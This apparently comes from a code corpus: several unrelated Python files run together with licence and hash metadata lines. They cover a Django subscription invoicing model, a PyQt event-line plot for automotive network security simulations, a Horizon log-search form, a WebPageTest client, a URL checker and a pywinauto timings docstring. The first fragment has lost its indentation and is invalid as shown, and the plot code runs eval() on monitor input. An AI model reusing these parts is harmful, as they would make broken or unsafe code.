new_invoice.reference = "Subscription Invoice " + str(datetime.today().strftime('%Y-%m-%d'))
new_invoice.save()
try:
op = self.orderedproduct_set.filter(trash=False).order_by('-date_created')[0]
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = op.quantity
opn.discount = op.discount
opn.subscription = self
opn.save()
except IndexError:
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = 1
opn.subscription = self
opn.save()
return new_invoice.reference
def check_status(self):
"""
Checks and sets the state of the subscription
"""
if not self.active:
return 'Inactive'
if self.expiry:
if datetime.now() > datetime.combine(self.expiry, time.min):
self.deactivate()
return 'Expired'
if not self.cycle_end:
self.renew()
cycle_end = self.cycle_end
        #once the cycle end has been reached, invoice, wait for payment, or deactivate after the grace period
if datetime.now().date() >= cycle_end:
cycle_start = self.get_cycle_start()
#if we haven't already invoiced them, invoice them
grace = 3
if (datetime.now().date() - cycle_end > timedelta(days=grace)):
#Subscription has overrun and must be shut down
return self.deactivate()
try:
conf = ModuleSetting.get_for_module('maker.sales', 'order_fulfil_status')[0]
order_fulfil_status = SaleStatus.objects.get(pk=long(conf.value))
except Exception:
order_fulfil_status = None
if self.orderedproduct_set.filter(order__datetime__gte=cycle_start).filter(order__status=order_fulfil_status):
return 'Paid'
elif self.orderedproduct_set.filter(order__datetime__gte=cycle_start):
return 'Invoiced'
else:
self.invoice()
return 'Invoiced'
else:
return 'Active'
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_subscription_view', args=[self.id])
except Exception:
return ""
class Meta:
"Subscription"
ordering = ['expiry']
class OrderedProduct(Object):
"Ordered Product"
subscription = models.ForeignKey(Subscription, blank=True, null=True)
product = models.ForeignKey(Product)
quantity = models.DecimalField(max_digits=30, decimal_places=2, default=1)
discount = models.DecimalField(max_digits=5, decimal_places=2, default=0)
tax = models.ForeignKey(Tax, blank=True, null=True, on_delete=models.SET_NULL)
rate = models.DecimalField(max_digits=20, decimal_places=2)
rate_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
order = models.ForeignKey(SaleOrder)
description = models.TextField(blank=True, null=True)
fulfilled = models.BooleanField(default=False)
access_inherit = ('order', '*module', '*user')
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_ordered_view', args=[self.id])
except Exception:
return ""
def get_total(self):
"Returns total sum for this item"
total = self.rate * self.quantity
if self.discount:
total = total - (total*self.discount/100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'),rounding=ROUND_UP)
def get_total_display(self):
"Returns total sum for this item in the display currency"
total = self.rate_display * self.quantity
if self.discount:
total = total - (total*self.discount/100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'),rounding=ROUND_UP)
class Meta:
"OrderedProduct"
ordering = ['product']
| mit | -7,272,710,793,605,936,000 | 36.151874 | 124 | 0.552771 | false |
PhilippMundhenk/IVNS | ECUInteraction/gui/plugins/views/event_line_view_impl.py | 1 | 21119 | '''
Created on 27 Apr, 2015
@author: artur.mrowca
'''
from gui.plugins.views.abstract_viewer_plug import AbstractViewerPlugin
from PyQt4.Qt import QWidget
from PyQt4 import QtGui
import pyqtgraph as pg
import numpy as np
from numpy.core.defchararray import isnumeric
from config import can_registration
from io_processing.surveillance_handler import MonitorTags, MonitorInput
from io_processing.result_interpreter.eventline_interpreter import EventlineInterpreter
from tools.general import General
from uuid import UUID
from math import floor
class ECUShowAxis(pg.AxisItem):
def __init__(self, orientation, *args):
pg.AxisItem.__init__(self, orientation, *args)
self.lanes_map = {} # key: number, value: text
def tickValues(self, minVal, maxVal, size):
minVal, maxVal = sorted((minVal, maxVal))
minVal *= self.scale
maxVal *= self.scale
# size *= self.scale
ticks = []
tickLevels = self.tickSpacing(minVal, maxVal, size)
allValues = np.array([])
for i in range(len(tickLevels)):
spacing, offset = tickLevels[i]
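            # spacing is pinned to 1 so every integer lane index gets its own
            # tick (the labels come from lanes_map, see tickStrings below)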
spacing = 1
# # determine starting tick
start = (np.ceil((minVal - offset) / spacing) * spacing) + offset
# # determine number of ticks
num = int((maxVal - start) / spacing) + 1
values = (np.arange(num) * spacing + start) / self.scale
# # remove any ticks that were present in higher levels
# # we assume here that if the difference between a tick value and a previously seen tick value
# # is less than spacing/100, then they are 'equal' and we can ignore the new tick.
values = list(filter(lambda x: all(np.abs(allValues - x) > spacing * 0.01), values))
allValues = np.concatenate([allValues, values])
ticks.append((spacing / self.scale, values))
if self.logMode:
return self.logTickValues(minVal, maxVal, size, ticks)
return ticks
def tickStrings(self, values, scale, spacing):
strns = []
for x in values:
try:
text = self.lanes_map[int(x)]
except:
text = ""
strns.append(text)
return strns
class EventlineViewPlugin(AbstractViewerPlugin):
def __init__(self, *args, **kwargs):
AbstractViewerPlugin.__init__(self, *args, **kwargs)
def get_combobox_name(self):
return "Chain of events"
def get_widget(self, parent):
self.gui = EventlineViewPluginGUI(parent)
return self.gui
def get_interpreters(self):
return [EventlineInterpreter]
def link_axis(self):
return self.gui.plot
def load(self, data):
self.gui.load(data)
def save(self):
return self.gui.save()
def update_gui(self, interpreter_input):
self.gui.update_gui(interpreter_input)
class EventlineViewPluginGUI(QWidget):
def __init__(self, parent):
QWidget.__init__(self, parent)
self.lastClicked = []
self._all_points = []
self.create_widgets(parent)
self._lane_map = {}
self._taken_lanes = {}
self.map_points = {}
self.known = []
self.COLOR_ECU_AUTH = (255, 0, 0)
self.COLOR_STR_AUTH = (0, 255, 0)
self.COLOR_SIMPLE = (0, 0, 255)
self.COLOR_PROCESS = (123, 123, 0)
self.COLOR_PROCESS_2 = (0, 123, 123)
self._init_categories()
self._mode = 'LW_AUTH'
self._pts_ecu = {}
def _already_there(self, mon_input):
''' handles duplicates'''
if hash(mon_input) in self.known:
return True
self.known.append(hash(mon_input))
if len(self.known) > 1000:
            del self.known[:int(floor(len(self.known) / 2.0))]  # slice index must be an int
return False
def _clicked(self, plot, points):
for p in self.lastClicked:
p.resetPen()
try: info = points[0].data()
except: info = False
if info:
try: info[5]
except: info += [0, 0, 0, 0, 0]
if len(str(info[2])) > 100:
showos = info[2][:99]
else:
showos = info[2]
self.label.setText("ECU: %s\t\t Time:%s \t\nMessageID: %s \tMessage: %s \t\nSize: %s \t\t\tCorresponding ID: %s \tStream ID: %s" % (info[0], info[-1], self._id_to_str(info[1]), showos, info[3], info[6], info[5]))
for p in points:
p.setPen('b', width=2)
self.lastClicked = points
def _init_categories(self):
# TESLA
self.tesla_time_sync_send = [MonitorTags.CP_SEND_SYNC_MESSAGE, MonitorTags.CP_SEND_SYNC_RESPONSE_MESSAGE]
self.tesla_time_sync_rec = [MonitorTags.CP_RECEIVE_SYNC_RESPONSE_MESSAGE]
self.tesla_setup_send = [MonitorTags.CP_ENCRYPTED_EXCHANGE_FIRST_KEY_KN]
self.tesla_setup_rec = [MonitorTags.CP_RECEIVED_EXCHANGE_FIRST_KEY_KN]
self.tesla_simple_message_send = [MonitorTags.CP_MACED_TRANSMIT_MESSAGE]
self.tesla_simple_message_rec = [MonitorTags.CP_BUFFERED_SIMPLE_MESSAGE]
self.tesla_message_authenticated = [MonitorTags.CP_RETURNED_AUTHENTICATED_SIMPLE_MESSAGE]
self.tesla = self.tesla_time_sync_send + self.tesla_time_sync_rec + self.tesla_setup_send + self.tesla_setup_rec + self.tesla_simple_message_send + self.tesla_simple_message_rec + self.tesla_message_authenticated
# TLS
self.hand_shake_tag_server_send = [MonitorTags.CP_SEND_SERVER_HELLO, MonitorTags.CP_SEND_SERVER_CERTIFICATE, MonitorTags.CP_SEND_SERVER_KEYEXCHANGE, MonitorTags.CP_SEND_CERTIFICATE_REQUEST, MonitorTags.CP_SEND_SERVER_HELLO_DONE, \
MonitorTags.CP_CLIENT_FINISHED_GENERATED_HASH_PRF]
self.hand_shake_tag_server_rec = [MonitorTags.CP_RECEIVE_CLIENT_HELLO, MonitorTags.CP_RECEIVE_CLIENT_CERTIFICATE, MonitorTags.CP_RECEIVE_CLIENT_KEYEXCHANGE, MonitorTags.CP_RECEIVE_CERTIFICATE_VERIFY, MonitorTags.CP_RECEIVED_CHANGE_CIPHER_SPEC, \
MonitorTags.CP_RECEIVE_CLIENT_FINISHED]
self.hand_shake_tag_server_process = [MonitorTags.CP_CLIENT_CERTIFICATE_VALIDATED, MonitorTags.CP_DECRYPTED_CLIENT_KEYEXCHANGE, MonitorTags.CP_DECRYPTED_CERTIFICATE_VERIFY , MonitorTags.CP_GENERATED_MASTER_SECRET_CERT_VERIFY, \
MonitorTags.CP_CLIENT_FINISHED_HASHED_COMPARISON_HASH , MonitorTags.CP_CLIENT_AUTHENTICATED]
self.hand_shake_tag_client_send = [MonitorTags.CP_SEND_CLIENT_HELLO, MonitorTags.CP_SEND_CLIENT_CERTIFICATE , MonitorTags.CP_ENCRYPTED_CLIENT_KEYEXCHANGE , \
MonitorTags.CP_SEND_CIPHER_SPEC , MonitorTags.CP_GENERATED_HASH_FROM_PRF_CLIENT_FINISHED, MonitorTags.CP_GENERATED_HASH_FROM_PRF_SERVER_FINISHED]
self.hand_shake_tag_client_rec = [MonitorTags.CP_RECEIVE_SERVER_HELLO, MonitorTags.CP_RECEIVE_SERVER_CERTIFICATE , MonitorTags.CP_RECEIVE_SERVER_KEYEXCHANGE, \
MonitorTags.CP_RECEIVE_CERTIFICATE_REQUEST, MonitorTags.CP_RECEIVE_SERVER_HELLO_DONE, MonitorTags.CP_RECEIVE_SERVER_FINISHED ]
self.hand_shake_tag_client_process = [MonitorTags.CP_SERVER_HELLO_DONE_VALIDATED_CERT, MonitorTags.CP_ENCRYPTED_CLIENT_KEYEXCHANGE , MonitorTags.CP_GENERATED_MASTERSEC_CLIENT_KEYEXCHANGE , MonitorTags.CP_INIT_SEND_CERTIFICATE_VERIFY, \
MonitorTags.CP_ENCRYPTED_CERTIFICATE_VERIFY, MonitorTags.CP_INIT_CLIENT_FINISHED , MonitorTags.CP_HASHED_CLIENT_FINISHED, MonitorTags.CP_SERVER_FINISHED_HASHED_COMPARISON_HASH , \
MonitorTags.CP_SERVER_FINISHED_GENERATED_HASH_PRF, MonitorTags.CP_INIT_SERVER_FINISHED , MonitorTags.CP_HASHED_SERVER_FINISHED, MonitorTags.CP_SERVER_AUTHENTICATED ]
self.simple_tags_send = [MonitorTags.CP_SESSION_AVAILABLE_SEND_MESSAGE]
self.simple_tags_rec = [ MonitorTags.CP_RECEIVE_SIMPLE_MESSAGE ]
self.tls = self.hand_shake_tag_server_send + self.hand_shake_tag_server_rec + self.hand_shake_tag_server_process + self.hand_shake_tag_client_send + self.hand_shake_tag_client_rec + self.hand_shake_tag_client_process \
+ self.simple_tags_send + self.simple_tags_rec
# authentication
self.sec_mod_tags = [MonitorTags.CP_SEC_INIT_AUTHENTICATION, MonitorTags.CP_SEC_ECNRYPTED_CONFIRMATION_MESSAGE, MonitorTags.CP_SEC_COMPARED_HASH_REG_MSG, \
MonitorTags.CP_SEC_ENCRYPTED_DENY_MESSAGE, MonitorTags.CP_SEC_ENCRYPTED_GRANT_MESSAGE, MonitorTags.CP_SEC_DECRYPTED_REQ_MESSAGE, MonitorTags.CP_SEC_RECEIVE_REG_MESSAGE]
self.authent_tags_send = [MonitorTags.CP_SEC_INIT_AUTHENTICATION, MonitorTags.CP_SEC_ECNRYPTED_CONFIRMATION_MESSAGE, MonitorTags.CP_ECU_SEND_REG_MESSAGE]
self.authent_tags_receive = [MonitorTags.CP_SEC_COMPARED_HASH_REG_MSG, MonitorTags.CP_ECU_VALIDATED_SEC_MOD_CERTIFICATE, MonitorTags.CP_ECU_DECRYPTED_CONF_MESSAGE]
self.author_tags_send = [MonitorTags.CP_SEC_ENCRYPTED_DENY_MESSAGE, MonitorTags.CP_SEC_ENCRYPTED_GRANT_MESSAGE, MonitorTags.CP_ECU_ENCRYPTED_REQ_MESSAGE]
self.author_tags_receive = [MonitorTags.CP_ECU_DECRYPTED_DENY_MESSAGE, MonitorTags.CP_ECU_DECRYPTED_GRANT_MESSAGE, MonitorTags.CP_SEC_DECRYPTED_REQ_MESSAGE]
self.simp_tags_send = [MonitorTags.CP_ECU_ENCRYPTED_SEND_SIMPLE_MESSAGE]
self.simp_tags_receive = [MonitorTags.CP_ECU_DECRYPTED_SIMPLE_MESSAGE]
self.lw_auth = self.sec_mod_tags + self.authent_tags_send + self.authent_tags_receive + self.author_tags_send + self.author_tags_receive + self.simp_tags_send + self.simp_tags_receive
def create_widgets(self, parent):
vbox = QtGui.QVBoxLayout()
self.label = QtGui.QLabel()
self.label.setText("Chainview")
view = pg.GraphicsLayoutWidget(parent)
self.axis = ECUShowAxis(orientation='left')
self.plot = view.addPlot(axisItems={'left': self.axis})
self.plot.setLabel('left', 'ECU ID ')
self.plot.setLabel('bottom', 'Time [sec]')
self.plot.showGrid(x=True, y=True)
vbox.addWidget(self.label)
vbox.addWidget(view)
self.setLayout(vbox)
def save(self):
return self._all_points
def load(self, val_pairs):
self._all_points = val_pairs
spots = []
for val in val_pairs:
x_pos = val[0]
y_pos = val[1]
info = val[2:-2]
arr = np.ndarray(2)
arr[0] = x_pos
arr[1] = y_pos
spots.append({'pos': arr, 'data': info, 'brush':pg.mkBrush(val[-2][0], val[-2][1], val[-2][2], 120), 'symbol': val[-1], 'size': 8})
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
s2.addPoints(spots)
self.plot.addItem(s2)
s2.sigClicked.connect(self._clicked)
def _next_security_module_lane(self, id_string):
        # determine the next free lane;
        # if the element is already known, return its corresponding lane
        if id_string in self._taken_lanes:
            return self._taken_lanes[id_string]
        try:
            num = -int(self._get_last_num(id_string))
        except:
            num = -1
        if num in self._taken_lanes.values():
            # keep security modules on negative lanes, clear of the ECU lanes
            while True:
                num -= 1
                if num not in self._taken_lanes.values():
                    break
self._taken_lanes[id_string] = num
self.axis.lanes_map[num] = id_string
return num
def _next_ecu_lane(self, id_string):
        # determine the next free lane;
        # if the element is already known, return its corresponding lane
if id_string in self._taken_lanes:
return self._taken_lanes[id_string]
try:
num = int(self._get_last_num(id_string))
except:
num = None
        if num in self._taken_lanes.values() or num is None:
            if num is None: num = 0
while True:
num += 1
if num not in self._taken_lanes.values():
break
self._taken_lanes[id_string] = num
self.axis.lanes_map[num] = id_string
return num
def update_gui(self, monitor_input_lst):
val_pairs = []
# print("Eventmonitor start %s" % monitor_input_lst)
for monitor_input in monitor_input_lst:
if self._already_there(str(monitor_input)): continue
# get ecu ids
if isinstance(monitor_input, str):
for ecu_id in monitor_input_lst:
if not isinstance(ecu_id, str): continue
if isinstance(ecu_id, UUID): continue
self._next_ecu_lane(ecu_id)
continue
if not isinstance(monitor_input, (list, tuple)): continue
# if self._already_there(monitor_input): continue
# Define mode
if eval(monitor_input[3]) in self.tesla:
self._mode = "TESLA"
if eval(monitor_input[3]) in self.tls:
self._mode = "TLS"
if eval(monitor_input[3]) in self.lw_auth:
self._mode = "LW_AUTH"
# extract information
try: t = monitor_input[0]
except: continue
# assign a lane to it
if eval(monitor_input[3]) in self.sec_mod_tags: # security module
id_val = self._next_security_module_lane(monitor_input[1])
else: # ecu
id_val = self._next_ecu_lane(monitor_input[1])
id_val += 0.00000001
# gather information
fst = [t, id_val, monitor_input[1]]
try: scd = [monitor_input[4], monitor_input[5], monitor_input[6], monitor_input[1], monitor_input[7], monitor_input[2], monitor_input[0]] + [t]
except: continue
# Color
color = (0, 0, 0)
symb = 0
if eval(monitor_input[3]) in self.authent_tags_send + self.hand_shake_tag_client_send + self.tesla_time_sync_send:
color = self.COLOR_ECU_AUTH
symb = 0
if eval(monitor_input[3]) in self.authent_tags_receive + self.hand_shake_tag_client_rec + self.tesla_time_sync_rec:
color = self.COLOR_ECU_AUTH
symb = 1
if eval(monitor_input[3]) in self.author_tags_send + self.hand_shake_tag_server_send + self.tesla_setup_send:
color = self.COLOR_STR_AUTH
symb = 0
if eval(monitor_input[3]) in self.author_tags_receive + self.hand_shake_tag_server_rec + self.tesla_setup_rec:
color = self.COLOR_STR_AUTH
symb = 1
if eval(monitor_input[3]) in self.simp_tags_send + self.simple_tags_send + self.tesla_simple_message_send:
color = self.COLOR_SIMPLE
symb = 0
if eval(monitor_input[3]) in self.simp_tags_receive + self.simple_tags_rec + self.tesla_simple_message_rec:
color = self.COLOR_SIMPLE
symb = 1
if eval(monitor_input[3]) in self.tesla_message_authenticated:
color = self.COLOR_PROCESS_2
symb = 2
# if eval(monitor_input[3]) in self.hand_shake_tag_server_process:
# color = self.COLOR_STR_AUTH
# symb = 2
if color == (0, 0, 0): continue
# value pair
val_pairs.append(fst + scd + [color, symb])
spots = []
try: last_free = val_pairs[0][0]
except: last_free = None
for val in val_pairs:
x_pos = val[0]
y_pos = val[1]
info = val[2:-2]
try: info[2] = info[2].get()
except: pass
# Points at same y positions will be shifted to be distinguishable
res = False
try: already_existing = self._pts_ecu[info[0]][x_pos]
except: already_existing = False
if already_existing:
# x_pos = last_free
# find new value
found = False
while not found:
x_pos += 0.00001
try: already_existing = self._pts_ecu[info[0]][x_pos]
except: already_existing = False
if not already_existing:
found = True
# last_free = x_pos
# print(" Plotting x: %s" % x_pos)
General().add_to_three_dict(self._pts_ecu, info[0], x_pos, True)
arr = np.ndarray(2)
arr[0] = x_pos
arr[1] = y_pos
spots.append({'pos': arr, 'data': info, 'brush':pg.mkBrush(val[-2][0], val[-2][1], val[-2][2], 120), 'symbol': val[-1], 'size': 8})
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
s2.addPoints(spots)
self.plot.addItem(s2)
s2.sigClicked.connect(self._clicked)
self._all_points += val_pairs
# self.map_points[str(s2[0])]
# print("Eventmonitor end")
def _get_last_num(self, stri):
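        # Collects the trailing digits of a string, e.g. "SecMod15" -> "15";
        # returns "" when the string has no numeric tail (examples illustrative).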
num = ""
for el in stri[::-1]:
if isnumeric(el):
num += el
else:
break
return num[::-1]
def _id_to_str(self, msg_id):
if self._mode == "TLS":
if msg_id == can_registration.CAN_TLS_CERTIFICATE:
return "Client Certificate"
if msg_id == can_registration.CAN_TLS_CERTIFICATE_REQUEST:
return "Certificate Request"
if msg_id == can_registration.CAN_TLS_CERTIFICATE_VERIFY:
return "Certificate Verify"
if msg_id == can_registration.CAN_TLS_CHANGE_CIPHER_SPEC:
return "Change Cipher Spec"
if msg_id == can_registration.CAN_TLS_CLIENT_HELLO:
return "ClientHello"
if msg_id == can_registration.CAN_TLS_CLIENT_KEY_EXCHANGE:
return "Client Key Exchange"
if msg_id == can_registration.CAN_TLS_FINISHED:
return "Finished "
if msg_id == can_registration.CAN_TLS_SERVER_CERTIFICATE:
return "Server Certificate "
if msg_id == can_registration.CAN_TLS_SERVER_HELLO:
return "ServerHello "
if msg_id == can_registration.CAN_TLS_SERVER_HELLO_DONE:
return "ServerHelloDone "
if msg_id == can_registration.CAN_TLS_SERVER_KEY_EXCHANGE:
return "ServerKeyExchange "
if self._mode == "LW_AUTH":
if msg_id == can_registration.CAN_ECU_AUTH_ADVERTISE:
return "ECU Advertisement"
if msg_id == can_registration.CAN_ECU_AUTH_CONF_MSG:
return "Confirmation Message"
if msg_id == can_registration.CAN_ECU_AUTH_REG_MSG:
return "Registration Message"
if msg_id == can_registration.CAN_STR_AUTH_DENY_MSG:
return "Deny Message"
if msg_id == can_registration.CAN_STR_AUTH_GRANT_MSG:
return "Grant Message"
if msg_id == can_registration.CAN_STR_AUTH_INIT_MSG_STR:
return "Request Message"
if self._mode == "TESLA":
if msg_id == can_registration.CAN_TESLA_TIME_SYNC:
return "Time Sync"
if msg_id == can_registration.CAN_TESLA_TIME_SYNC_RESPONSE:
return "Time Sync Response"
if msg_id == can_registration.CAN_TESLA_KEY_EXCHANGE:
return "Key Exchange"
return msg_id
def _is_sec_mod(self, ecu):
try:
ecu._SECMODULE
return True
except:
pass
return False
| mit | -4,896,457,529,280,774,000 | 41.751012 | 253 | 0.551541 | false |
NECCSiPortal/NECCSPortal-dashboard | nec_portal/dashboards/project/history/forms.py | 1 | 2741 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from django.core.urlresolvers import reverse_lazy
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import forms
from horizon import messages
class HistoryForm(forms.SelfHandlingForm):
search = forms.CharField(label=_('Keyword'),
required=False,
max_length=255,
help_text=_(
'[1]Regular expression is available.'
'(Ex.)"user_name:demo*" '
'returns all the logs of users whose '
'name beginning with "demo". '
'[2]All columns are searched when no '
'columns are selected. '
'[3]AND/OR/NOT search operators are '
'supported.(Ex.)"user_name:demo '
'AND POST" returns POST logs of '
'user "demo".'))
start = forms.DateField(label=_('From:'),
input_formats=("%Y-%m-%d",))
end = forms.DateField(label=_('To:'),
input_formats=("%Y-%m-%d",))
def __init__(self, *args, **kwargs):
super(HistoryForm, self).__init__(*args, **kwargs)
self.fields['start'].widget.attrs['data-date-format'] = "yyyy-mm-dd"
self.fields['end'].widget.attrs['data-date-format'] = "yyyy-mm-dd"
def clean(self):
cleaned_data = self.cleaned_data
start_date = cleaned_data.get('start', None)
end_date = cleaned_data.get('end', None)
if start_date and end_date and start_date > end_date:
messages.error(self.request,
_('Invalid time period. The end date should be '
'more recent than the start date.'))
return cleaned_data
def handle(self, request, data):
response = shortcuts.redirect(
reverse_lazy("horizon:project:history:index"))
return response
| apache-2.0 | -1,124,052,965,189,229,300 | 43.209677 | 76 | 0.551988 | false |
CDKGlobal/cd-performance-promotion | cd_perf_promotion/modules/webpagetest.py | 1 | 4765 | import requests
import json
import time
import sys
from cd_perf_promotion.modules.perftools import PerfTools
class WebPageTest(PerfTools):
"""
Handles all of the WebPageTest API querying/data gathering
"""
def __init__(self, url, location, runs, api_key):
"""
Sets up all of the instance variables
Keyword arguments:
api_key - The WebPageTest API key (string)
test_session - The WebPageTest Test ID (string)
"""
# Test configuration information
self.url = url
self.location = location
self.runs = runs
self.api_key = api_key
# Inherit methods from parent class "PerfTools"
PerfTools.__init__(self, "WebPageTest")
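
    # Minimal usage sketch (URL, location and API key values are hypothetical):
    #   wpt = WebPageTest("http://example.com", "Dulles:Chrome", 3, "MY_API_KEY")
    #   results = wpt.get_data()  # queues the test, polls until done, returns JSON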
def api_key_error(self):
"""
Let the user know that their WebPageTest API key limit has been exceeded
"""
print("ERROR: WebPageTest API key daily limit has been reached")
sys.exit(1)
def timeout_error(self):
"""
Let the user know that their WebPageTest UI test has timed out
"""
print("ERROR: WebPageTest has timed out")
sys.exit(1)
def run_test(self, url, location, runs, api_key):
"""
Runs the UI test
"""
# Run performance test (HTTP GET request)
run_test_url = "http://www.webpagetest.org/runtest.php?url={0}&runs={1}&f=json&location={2}&k={3}".format(url, runs, location, api_key)
try:
run_test_request = requests.get(run_test_url)
except:
self.connection_error() # Inherited from the parent class
# Make sure that the module actually got something back
# Covers cases where users enter crazy parameters or WebPageTest miraculously
# determines your query is bad
if (run_test_request.status_code != 200) or (run_test_request.json()["statusCode"] != 200):
if run_test_request.json()["statusCode"] == 400:
self.api_key_error()
else:
self.connection_error() # Inherited from the parent class
# Get the test ID so that we can look at the results later
test_id = run_test_request.json()["data"]["testId"]
# Let the user know what's going on
print("Queueing WebPageTest UI test... ({0})".format(test_id))
return test_id
def get_data(self):
"""
        Gets the UI test data from the WebPageTest API
"""
        # Run the test and get the Test ID
test_id = self.run_test(self.url, self.location, self.runs, self.api_key)
# Wait until the test results are ready
checkStatusCode = 100
timePassed = 0
testStatus = ""
test_summary_url = "http://www.webpagetest.org/jsonResult.php?test={0}".format(test_id)
while (checkStatusCode != 200):
if (timePassed > 3600):
# 60 minutes (3600 seconds) have passed, error out. Something probably went wrong.
# Pretty much have to have this timeout because WebPageTest can't be trusted
                self.timeout_error() # Inherited from the parent class
else:
# Check the test results
try:
test_summary_request = requests.get(test_summary_url)
except:
self.connection_error() # Inherited from the parent class
# Are the test results ready?
# Have to do some string to int conversions due to the XML stuff
if ((test_summary_request.status_code == 200) and
(test_summary_request.json()["statusCode"] == 200)):
# Yes, break the loop and
checkStatusCode = 200
elif ((test_summary_request.status_code == 200) and
((test_summary_request.json()["statusCode"] < 200) and
(test_summary_request.json()["statusCode"] >= 100))):
# Let the user know when the test has been started
newStatus = test_summary_request.json()["statusText"]
if newStatus != testStatus:
if (newStatus == "Test Started"):
print("Running WebPageTest UI test...")
testStatus = newStatus
# Be nice to the WebPageTest API
time.sleep(10)
timePassed += 10
else:
# Something broke
self.connection_error() # Inherited from the parent class
# Notify the user that the WebPageTest data is being grabbed
print("Retrieved WebPageTest data")
return test_summary_request.json()
| mit | -6,207,334,670,010,811,000 | 39.726496 | 143 | 0.565792 | false |
thefourtheye/elasticsearch-monitoring | url_checker.py | 1 | 2079 | from master import get_conn
try:
import simplejson as json
except ImportError:
import json
with open("urls.json") as f:
urls_data = json.load(f)
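
# Assumed shape of urls.json, inferred from the lookups below (illustrative):
# {
#     "cluster-health": {"protocol": "http", "host": "es1.example.com",
#                        "path": "/_cluster/health", "expectedHTTPCode": 200}
# }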
def sort(x):
return (x.get("success", False), x.get("url", ""))
def table(title, l):
temp = """
<table width='100%' border=1 cellpadding=3 cellspacing=0>
<caption>{0}</caption>
<tr><th>Expected</th><th>Actual</th><th>URL</th></tr>
""".format(title)
for item in sorted(l, key=sort):
temp += "<tr><td>" + "</td><td>".join([
str(item["expected"] or ""),
str(item["actual"] or ""),
str(item["url"] or "")
]) + "</td></tr>"
return temp + "</table><br/>"
def url_checker():
results = {
"severity": "INFO",
"title": "URLs Checker",
"body": ""
}
responses = []
for key, value in urls_data.items():
res, _, conn = get_conn(value.get("host"), value)[0]
expected = value.get("expectedHTTPCode", 200)
url = "{0}://{1}{2}".format(
value.get("protocol", "http"),
value.get("host", ""),
value.get("path", "")
)
result = {
"success": True,
"expected": expected,
"url": url
}
if res:
try:
r1 = conn(value.get("path", ""))
r1.read()
result.update({
"success": int(r1.status) == expected,
"actual": r1.status
})
            except Exception as ex:
result.update({
"success": False,
"actual": str(ex)
})
else:
result.update({
"success": False,
"actual": "Unable to establish connection to {0}".format(url)
})
responses.append(result)
if any(not r.get("success", False) for r in responses):
results["severity"] = "FATAL"
results["body"] = table("URLs Checker", responses)
return results
| mit | -1,274,268,218,179,104,300 | 26.72 | 77 | 0.46176 | false |
MagazinnikIvan/pywinauto | pywinauto/timings.py | 1 | 14481 | # GUI Application automation and testing library
# Copyright (C) 2006-2017 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Timing settings for all of pywinauto
This module has one object that should be used for all timing adjustments
timings.Timings
There are a couple of predefined settings
timings.Timings.Fast()
timings.Timings.Defaults()
timings.Timings.Slow()
The Following are the individual timing settings that can be adjusted:
* window_find_timeout (default 5)
* window_find_retry (default .09)
* app_start_timeout (default 10)
* app_start_retry (default .90)
* cpu_usage_interval (default .5)
* cpu_usage_wait_timeout (default 20)
* exists_timeout (default .5)
* exists_retry (default .3)
* after_click_wait (default .09)
* after_clickinput_wait (default .09)
* after_menu_wait (default .1)
* after_sendkeys_key_wait (default .01)
* after_button_click_wait (default 0)
* before_closeclick_wait (default .1)
* closeclick_retry (default .05)
* closeclick_dialog_close_wait (default 2)
* after_closeclick_wait (default .2)
* after_windowclose_timeout (default 2)
* after_windowclose_retry (default .5)
* after_setfocus_wait (default .06)
* setfocus_timeout (default 2)
* setfocus_retry (default .1)
* after_setcursorpos_wait (default .01)
* sendmessagetimeout_timeout (default .01)
* after_tabselect_wait (default .05)
* after_listviewselect_wait (default .01)
* after_listviewcheck_wait default(.001)
* after_treeviewselect_wait default(.1)
* after_toobarpressbutton_wait default(.01)
* after_updownchange_wait default(.1)
* after_movewindow_wait default(0)
* after_buttoncheck_wait default(0)
* after_comboboxselect_wait default(.001)
* after_listboxselect_wait default(0)
